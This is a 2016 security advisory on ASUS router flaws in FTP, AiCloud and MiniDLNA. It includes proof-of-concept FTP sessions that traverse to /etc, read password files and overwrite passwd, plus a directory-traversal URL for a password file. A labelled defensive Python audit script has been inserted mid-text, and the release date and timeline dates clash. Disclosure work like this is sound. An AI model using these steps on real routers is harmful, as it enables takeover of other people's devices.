Affected Vendor: ASUS - http://www.asus.com/au/Networking/Wireless-Routers-Products/
Affected Device: Multiple - including: RT-AC3200
Affected Version: Multiple - including: 3.0.0.4.378_7838
Issue type: Multiple Vulnerabilities
Release Date: 14 Apr 2016
Discovered by: T.J. Acton
Issue status: Vendor patch available at
http://www.asuswrt.net/2016/03/30/asus-release-beta-firmware-for-acn-router
Summary
ASUS produces a suite of mid to high-end consumer-grade routers. The RT-AC3200 is confirmed to be affected, and the following devices are assumed to be affected:
TM-AC1900
RT-AC3200
RT-AC87U
RT-AC68U
RT-AC68P
RT-AC68R
RT-AC68W
RT-AC66R
RT-AC66W
RT-AC66U
RT-AC56U
RT-AC51U
RT-N18U
1. Insecure default configuration for the Anonymous FTP user account
Description
The affected ASUS routers suffer from an insecure default configuration for Anonymous users once anonymous access is enabled. Write access is enabled for all directories in the attached storage by default. Furthermore, the administrator is not able to restrict read or write access for any specific directories on attached storage devices.
Impact
The anonymous FTP user can write arbitrary files to the attached storage device.
2. FTP users can access certain system files when Download Master is installed
Description
The affected routers suffer from a vulnerability relating to symlinks and weak permissions for FTP Users, including the Anonymous FTP User. Users are able to gain limited access to certain system files and directories when Download Master is installed.
Impact
The attacker can read certain system files via FTP.
3. FTP users can read all system files, and retrieve an unsalted root password hash, when Download Master is installed
Description
The affected routers suffer from a vulnerability relating to symlinks and weak permissions for FTP Users, including the Anonymous FTP User. Users are able to access all system files and directories, including /etc. This vulnerability leads to SSH / admin interface access due to the exposure of the Lighttpd password stored as an unsalted MD5 hash - this password is automatically created by copying the root user’s existing credentials for SSH / Administrative Interface access.
Legend:
Condition A: When Download Master is installed
Condition B: When read access for the ASUSWARE.ARM USB directory had already been granted to any other FTP user at the time the anonymous user account was enabled
Condition C: When read access for the ASUSWARE.ARM USB directory has been granted to the current FTP user
User | Condition A | Condition B | Condition C
---|---|---|---
Anonymous | x | x |
FTP User Accounts | x | | x
Impact
The attacker gains access to all system files, including /etc/passwd. This exposes the unsalted MD5 lighttpd password hash, which is automatically created by copying the root user's credentials for SSH / Administrative Interface access.
Proof of concept
A complete PoC exploit script will be released after public disclosure. The script leverages an anonymous user account, or a valid FTP user account, retrieves and cracks the root password hash, and attempts to spawn an SSH shell in the context of the root user.
$ ftp 192.168.1.1
Connected to 192.168.1.1.
220 Welcome to ASUS RT-AC3200 FTP service.
Name (192.168.1.1:acton): anonymous
331 Please specify the password.
Password:
230 Login successful.
ftp> cd /../opt
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||19683|)
150 Here comes the directory listing.
lrwxrwxrwx 1 0 0 39 Jan 06 12:58 asusware.arm -> /tmp/mnt/sda1/asusware.arm/asusware.arm
drwxr-xr-x 2 0 0 860 Jan 06 12:58 bin
lrwxrwxrwx 1 0 0 30 Jan 06 12:58 etc -> /tmp/mnt/sda1/asusware.arm/etc
lrwxrwxrwx 1 0 0 34 Jan 06 12:58 include -> /tmp/mnt/sda1/asusware.arm/include
lrwxrwxrwx 1 0 0 31 Jan 06 12:58 info -> /tmp/mnt/sda1/asusware.arm/info
drwxr-xr-x 2 0 0 2860 Jan 06 12:58 lib
lrwxrwxrwx 1 0 0 30 Jan 06 12:58 man -> /tmp/mnt/sda1/asusware.arm/man
lrwxrwxrwx 1 0 0 31 Jan 06 12:58 sbin -> /tmp/mnt/sda1/asusware.arm/sbin
lrwxrwxrwx 1 0 0 32 Jan 06 12:58 share -> /tmp/mnt/sda1/asusware.arm/share
lrwxrwxrwx 1 0 0 30 Jan 06 12:58 tmp -> /tmp/mnt/sda1/asusware.arm/tmp
lrwxrwxrwx 1 0 0 30 Jan 06 12:58 usr -> /tmp/mnt/sda1/asusware.arm/usr
226 Directory send OK.
ftp> cd etc
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||39223|)
150 Here comes the directory listing.
drwxrwxrwx 1 0 0 4096 Jan 06 12:57 asus_conf.d
-rwxrwxrwx 1 0 0 11269 Jul 22 2013 asus_lighttpd.conf
-rwxrwxrwx 1 0 0 39 Feb 18 2014 asus_lighttpdpassword
-rwxrwxrwx 1 0 0 3264 Oct 25 2012 asus_modules.conf
drwxrwxrwx 1 0 0 4096 Jan 06 12:57 asus_script
drwxrwxrwx 1 0 0 4096 Jan 06 12:58 dm2_amule
-rwxrwxrwx 1 0 0 40 Jan 06 12:58 dm2_ed2k.conf
-rwxrwxrwx 1 0 0 694 Jan 06 12:58 dm2_general.conf
-rwxrwxrwx 1 0 0 694 Jan 06 12:58 dm2_general_bak.conf
-rwxrwxrwx 1 0 0 36108 Jan 06 12:58 dm2_nzbget.conf
-rwxrwxrwx 1 0 0 97 Jan 06 12:58 dm2_snarf.conf
-rwxrwxrwx 1 0 0 156 Jan 06 12:58 dm2_transmission.conf
drwxrwxrwx 1 0 0 4096 Jan 06 12:57 downloadmaster
-rwxrwxrwx 1 0 0 0 Jan 05 12:15 hello.html
drwxrwxrwx 1 0 0 4096 Jan 06 12:57 init.d
-rwxrwxrwx 1 0 0 263 Jan 06 12:58 ipkg.conf
-rwxrwxrwx 1 0 0 214 Jan 06 14:09 passwd
-rwxrwxrwx 1 0 0 23 Jan 05 12:20 test.sh
226 Directory send OK.
4. FTP users can overwrite arbitrary system files
Description
The affected routers suffer from a vulnerability relating to symlinks and weak permissions for FTP Users, including the Anonymous FTP User. Users are able to overwrite arbitrary files, including system files. This vulnerability leads to SSH / admin interface access due to the exposure of the Lighttpd password stored as an unsalted MD5 hash - this password is automatically created by copying the root user’s existing credentials for SSH / Administrative Interface access.
Legend:
Condition A: When Download Master is installed
Condition B: When write access for the ASUSWARE.ARM USB directory had already been granted to any other FTP user at the time the anonymous user account was enabled
Condition C: When write access for the ASUSWARE.ARM USB directory has been granted to the current FTP user
User | Condition A | Condition B | Condition C
---|---|---|---
Anonymous | x | x |
FTP User Accounts | x | | x
Impact
The attacker gains write privileges to all system files, including /etc/passwd and /etc/shadow.
Proof of concept
ftp> cd etc
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||39223|)
150 Here comes the directory listing.
drwxrwxrwx 1 0 0 4096 Jan 06 12:57 asus_conf.d
-rwxrwxrwx 1 0 0 11269 Jul 22 2013 asus_lighttpd.conf
-rwxrwxrwx 1 0 0 39 Feb 18 2014 asus_lighttpdpassword
-rwxrwxrwx 1 0 0 3264 Oct 25 2012 asus_modules.conf
drwxrwxrwx 1 0 0 4096 Jan 06 12:57 asus_script
drwxrwxrwx 1 0 0 4096 Jan 06 12:58 dm2_amule
-rwxrwxrwx 1 0 0 40 Jan 06 12:58 dm2_ed2k.conf
-rwxrwxrwx 1 0 0 694 Jan 06 12:58 dm2_general.conf
-rwxrwxrwx 1 0 0 694 Jan 06 12:58 dm2_general_bak.conf
-rwxrwxrwx 1 0 0 36108 Jan 06 12:58 dm2_nzbget.conf
-rwxrwxrwx 1 0 0 97 Jan 06 12:58 dm2_snarf.conf
-rwxrwxrwx 1 0 0 156 Jan 06 12:58 dm2_transmission.conf
drwxrwxrwx 1 0 0 4096 Jan 06 12:57 downloadmaster
-rwxrwxrwx 1 0 0 0 Jan 05 12:15 hello.html
drwxrwxrwx 1 0 0 4096 Jan 06 12:57 init.d
-rwxrwxrwx 1 0 0 263 Jan 06 12:58 ipkg.conf
-rwxrwxrwx 1 0 0 214 Jan 06 14:09 passwd
-rwxrwxrwx 1 0 0 23 Jan 05 12:20 test.sh
226 Directory send OK.
ftp> put passwd
local: passwd remote: passwd
229 Entering Extended Passive Mode (|||41235|)
150 Ok to send data.
100% |*************************************************************************************************************************************| 214 283.94 KiB/s 00:00 ETA
226 File receive OK.
214 bytes sent in 00:00 (60.83 KiB/s)
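As an added check for the symlink and weak-permission issues above (issues 2 to 4), and not part of the original advisory: a small Python audit that parses FTP LIST output like the sessions shown, flagging symlinks that resolve into the USB-backed asusware.arm tree and credential files that are world-writable. The sample listing is constructed from the advisory's own output, and check_router is an assumed helper a router owner can run against their own device.

```python
import re
from ftplib import FTP  # only used by check_router()

# Constructed sample, copied from the LIST output shown in the advisory.
SAMPLE_LISTING = """\
lrwxrwxrwx 1 0 0 30 Jan 06 12:58 etc -> /tmp/mnt/sda1/asusware.arm/etc
drwxr-xr-x 2 0 0 860 Jan 06 12:58 bin
-rwxrwxrwx 1 0 0 39 Feb 18 2014 asus_lighttpdpassword
-rwxrwxrwx 1 0 0 214 Jan 06 14:09 passwd
-rw-r--r-- 1 0 0 100 Jan 06 14:09 readme.txt
"""

# Files whose exposure the advisory identifies as leading to root/admin access.
SENSITIVE_NAMES = {"passwd", "shadow", "asus_lighttpdpassword"}

# Unix-style LIST line: mode links uid gid size month day time|year name [-> target]
LIST_RE = re.compile(
    r"^(?P<mode>[-dl][rwx-]{9})\s+\d+\s+\d+\s+\d+\s+\d+\s+\S+\s+\d+\s+\S+\s+"
    r"(?P<name>.+?)(?: -> (?P<target>.+))?$"
)


def audit_listing(listing):
    """Return one finding string per risky entry in a LIST response."""
    findings = []
    for line in listing.splitlines():
        m = LIST_RE.match(line.strip())
        if not m:
            continue  # ignore status lines such as "226 Directory send OK."
        mode, name, target = m.group("mode"), m.group("name"), m.group("target")
        # System directories symlinked onto the USB mount are reachable via FTP.
        if mode[0] == "l" and target and target.startswith("/tmp/mnt/"):
            findings.append("symlink %s -> %s (system path backed by USB storage)" % (name, target))
        # mode[8] is the "other" write bit: -rwxrwxrwx means any FTP user can overwrite.
        if name in SENSITIVE_NAMES:
            access = "writable" if mode[8] == "w" else "readable"
            findings.append("sensitive file %s exposed (%s)" % (name, access))
    return findings


def check_router(host):
    """Assumed helper: log in anonymously and audit /../opt/etc as in the advisory's session."""
    ftp = FTP(host, timeout=10)
    ftp.login()  # anonymous login; fails if the anonymous account is disabled
    lines = []
    ftp.cwd("/../opt/etc")
    ftp.retrlines("LIST", lines.append)
    ftp.quit()
    return audit_listing("\n".join(lines))
```

An empty list from audit_listing means no USB-backed system symlinks and no exposed credential files were seen in that directory.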
5. Sensitive file disclosure in AiCloud's AiDisk server
Description
AiCloud suffers from sensitive file exposure. Authenticated users are able to access sensitive files, including password and configuration files, via a directory traversal bug in AiCloud’s AiDisk server.
This vulnerability can lead to SSH/admin interface access as a result of unsalted MD5 hashed password disclosure. Note: unauthenticated users can exploit this issue whilst impersonating an administrative user (see TJA-ASUS-06).
Impact
Attackers can access sensitive files.
Proof of concept
https://192.168.1.1/RT-AC3200/sda1%2fasusware.arm/etc%2fasus_lighttpdpassword
6. Session management flaw in AiCloud
Description
AiCloud suffers from a session management flaw. If the attacker is on the same external network as the admin (or on the same local network), they can spoof their User-Agent to match the admin's User-Agent and thereby impersonate the Admin user. This is only possible while the Admin has an active session. Note: this vulnerability can lead to SSH/admin interface access as a result of unsalted MD5 hashed password disclosure, as per issue TJA-ASUS-05.
Impact
Attackers can access sensitive files.
7. Sensitive information disclosure in MiniDLNA server
Description
The MiniDLNA server on port 8200 suffers from a remote, unauthenticated sensitive information disclosure. Exposed information includes: details of all clients (including: internal IP address, MAC address, and device type), and file type statistics for attached storage devices.
Impact
Attackers can access sensitive information remotely, without authentication.
Proof of concept
http://[IP/HOST]:8200
MiniDLNA status
Media library
Audio files 347
Video files 0
Image files 6
Connected clients
ID Type IP Address HW Address Connections
0 Samsung Series [CDEF] 192.168.1.99 48:5A:3F:6D:02:A4 0
1 Unknown 192.168.1.55 78:31:C1:CD:11:63 0
0 connections currently open
Solution
Apply the patch available for download from vendor at the following address:
http://www.asuswrt.net/2016/03/30/asus-release-beta-firmware-for-acn-router/
Response timeline
07/01/2016 - Vendor contacted
22/03/2016 - Patch available.
26/03/2016 - Advisory released.